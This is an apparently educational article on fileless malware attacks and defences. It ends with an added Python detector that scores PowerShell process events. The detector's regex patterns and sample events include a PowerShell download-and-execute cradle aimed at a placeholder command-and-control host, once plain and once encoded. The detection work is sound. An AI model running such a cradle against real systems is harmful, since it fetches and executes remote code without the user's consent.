
SoS Musings #46 - The Battle Against Fileless Malware Attacks Continues

As organizations adopt more advanced attack detection and prevention methods, cybercriminals continue to increase the sophistication of their attack methods. Today's adversaries are increasingly adopting fileless attack techniques to circumvent most security protections. Fileless malware attacks, also known as zero-footprint attacks or non-malware attacks, differ from many other malware threats in that they do not require attackers to install software on a victim's machine. Instead, fileless malware attacks are executed by taking control of tools, software, and applications already installed on the victim's machine, which makes them stealthy and able to evade detection by most security solutions. As such attacks do not rely on files and leave no footprint, they are significantly more challenging to identify and remove. According to a Ponemon Institute report, fileless attacks are ten times more likely to succeed than file-based attacks. The cybersecurity and defense company Trend Micro revealed a 265 percent increase in fileless malware attacks in the first half of 2019 compared with the same period of 2018. A recent analysis of telemetry data from Cisco found that the most common critical-severity cybersecurity threat faced by endpoints in the first half of 2020 was fileless malware. One of the more dangerous examples of fileless malware is Emotet, a highly advanced Trojan that can extract banking credentials, passwords to administrative accounts, and more, which cybercriminals use to steal money or gain access to other key resources. ESET's latest "Cybersecurity Trends" report predicts that fileless attack methods will be used in highly sophisticated and larger-scale attacks in 2021. Fileless malware attacks call for the development, adoption, and exploration of advanced detection and prevention strategies.

A fileless malware attack is categorized as a Low-Observable Characteristics (LOC) attack. It is a stealth attack that most security solutions struggle to detect. Unlike traditional malware, fileless malware is not written to disk. Instead, fileless malware operates only in a computer's Random Access Memory (RAM), leaving no traces of its existence because nothing is ever written directly to the hard drive. The absence of traditional footprints adds an extra layer of difficulty to the forensic analysis that would help security teams investigate a breach and prevent future attacks. Fileless malware attacks are a subset of Living-off-the-Land (LotL) attacks, in which threat actors use trusted pre-installed system tools to hide their malicious activity. There are more than 100 Windows system tools that cybercriminals can exploit in LotL attacks.

PowerShell is a default Microsoft Windows tool commonly leveraged in fileless malware attacks. Windows PowerShell is a command-line shell and scripting language that has unrestricted access to the Windows operating system and provides unprecedented access to a machine's inner functions. As PowerShell is a built-in component of Windows, it enjoys a high level of trust among administrators and is used to automate tasks across multiple machines and to manage configuration. Other tools and components commonly abused for fileless attacks include Windows Management Instrumentation (WMI), PsExec, BITSAdmin, MSIExec, RegSvr32, CertUtil, Task Scheduler, and Microsoft Office macros. As with most cyberattacks, fileless malware attacks are often initiated through social engineering. A common fileless malware attack scenario starts with a user being tricked into clicking on a malicious link in a spam or phishing email. The user is then taken to a malicious website that requires Flash to display its content. The malicious website loads Flash, which contains vulnerabilities, on the user's computer. Flash then launches PowerShell, which executes instructions through the command line while running in memory. PowerShell then downloads and executes a script from a Command-and-Control (C&C) server that finds the user's data and sends it to the attacker.

Fileless malware attacks often rely on human weaknesses to start. As a fileless malware attack typically begins with a phishing email, it is important to increase awareness about how to recognize and avoid phishing scams. According to data analyzed by Atlas VPN, Google registered 2.02 million phishing websites in 2020, representing a 19.91 percent increase from 2019, when the volume of malicious sites reached 1.69 million. Based on data collected during the global "2020 Gone Phishing Tournament" organized by Terranova Security and Microsoft, almost one-fifth of employees click on phishing email links despite having gone through security training. The study showed that the share of employees who clicked on a phishing link despite security training grew by 77 percent, increasing from 11.2 percent in 2019 to 19.8 percent in 2020. A study by the USENIX Association and a team of researchers from several German universities suggests that organizations should require employees to go through phishing awareness training at least once every six months to prevent the effects of such training from fading. The study also found that video-based and interactive training formats were the most effective in reminding employees about phishing and social engineering attacks. As the number of phishing attacks continues to grow, thus increasing the likelihood of a fileless malware attack, it is important to adopt measures that prevent phishing from succeeding.

Cybersecurity experts have recommended that organizations adopt a multilayered or defense-in-depth approach to combating fileless attacks. Adopting or implementing solutions for analyzing, detecting, and improving user and system behavior is essential to combating fileless attacks. In addition to increasing security awareness among users, organizations can adopt User and Entity Behavior Analytics (UEBA) to help stop a fileless malware attack. Traditional file-based security monitoring tools detect malware based on disk scans, signatures, or rules, which makes them ineffective at detecting fileless malware. UEBA applies behavioral modeling and machine learning to identify anomalous and suspicious behaviors or entities, presenting an opportunity to detect fileless malware threats. UEBA solutions can help identify and track typical and unusual behaviors across users, hosts, software, and applications. Anomalous activity flagged by a UEBA tool can therefore reveal a fileless malware attack in progress. The cybersecurity software company Trend Micro recommends the use of custom sandboxes, along with Intrusion Detection and Prevention Systems (IDPS), to help pick up on C&C communication, data exfiltration, and other suspicious traffic. Other methods recommended for organizations to combat fileless attacks include applying policies that restrict the use of scripts and scripting languages, allowing scripts to run only from read-only network locations, limiting the use of interactive PowerShell within the organization, scanning macro scripts, and applying the latest security updates to the operating system. Fighting fileless malware attacks also requires additional research and novel solution developments. For example, a team of researchers analyzed ten recently emerged fileless cyberattacks to find out the characteristics and specific techniques used in the attacks. The researchers then divided the number of each type of technique used in a specific fileless cyberattack by the total number of available techniques, and identified and analyzed each resulting ratio across three different dimensions. This process led to the classification of fileless cyberattacks into three categories: evasion, attack, and collection. The researchers expect the study to provide a foundational framework for identifying and classifying the characteristics of fileless cyberattacks that are likely to appear in the future, thus contributing to potential response strategies. The battle against fileless malware attacks requires more training, multiple layers of security controls, and additional research.
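As an added example (not from the original post or from the sources it cites), the following Python triage scores constructed process-creation events for the chain described above, a user-facing parent such as Flash or Office spawning PowerShell that runs hidden and pulls a script into memory, and it expands -EncodedCommand blobs, since a policy that only limits interactive PowerShell never sees the encoded form. The event field names, the parent list, the indicator weights, the 4-point threshold and the sample command lines are all assumptions.

```python
# Heuristic triage of Windows process-creation events for the fileless chain in the text:
# a user-facing parent spawning hidden PowerShell that fetches a script and runs it in memory.
import base64
import re
# Parents that should almost never launch a shell in normal use (assumed list).
USER_FACING_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "flashplayer.exe",
                       "chrome.exe", "msedge.exe", "firefox.exe"}
# (regex over the lower-cased command line, weight, label); weights are assumed.
INDICATORS = [
    (r"-w(?:indowstyle)?\s+hidden", 1, "hidden window"),
    (r"-e[a-z]*\s+bypass", 1, "execution-policy bypass"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", 2, "download cradle"),
    (r"\biex\b|invoke-expression", 2, "in-memory execution"),
    (r"-e[a-z]*\s+[a-z0-9+/=]{20,}", 1, "encoded command"),
]

def expand_encoded(cmdline):
    """Append the plaintext of any -EncodedCommand blob (base64 of UTF-16LE) so it can be matched."""
    decoded = []
    for blob in re.findall(r"-e[a-z]*\s+([A-Za-z0-9+/=]{20,})", cmdline, re.I):
        try:
            decoded.append(base64.b64decode(blob).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # token is not a valid encoded command; ignore it
    return " ".join([cmdline] + decoded)

def score_event(ev):
    """Return (score, matched labels) for one event; non-PowerShell images score 0."""
    if not ev["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    hits = []
    if ev["parent"].lower().rsplit("\\", 1)[-1] in USER_FACING_PARENTS:
        hits.append(("user-facing parent", 2))
    text = expand_encoded(ev["cmdline"]).lower()
    hits += [(label, w) for pat, w, label in INDICATORS if re.search(pat, text)]
    return sum(w for _, w in hits), [label for label, _ in hits]

def triage(events, threshold=4):
    """Return (index, score, labels) for events scoring at or above threshold."""
    return [(i, s, h) for i, ev in enumerate(events) for s, h in [score_event(ev)] if s >= threshold]
# Constructed sample events (not real telemetry); hostnames are placeholders.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s')"
def ev(parent, cmdline):
    return {"parent": parent, "image": PS, "cmdline": cmdline}
SAMPLE_EVENTS = [
    ev("C:\\Windows\\explorer.exe", "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"),
    ev("C:\\Windows\\explorer.exe", "powershell.exe -Command Invoke-WebRequest https://u.example.invalid/x.msi -OutFile x.msi"),
    ev("C:\\Program Files\\Adobe\\flashplayer.exe", 'powershell.exe -NoP -W Hidden -Exec Bypass -Command "%s"' % CRADLE),
    ev("C:\\Program Files\\Microsoft Office\\winword.exe", "powershell.exe -NoP -NonI -Enc " + base64.b64encode(CRADLE.encode("utf-16-le")).decode()),
]
```

Only the last two events cross the threshold: the administrator's scheduled script scores 0 and the interactive download scores 2, while the Flash-spawned cradle and its encoded Office-spawned twin score 8 and 7.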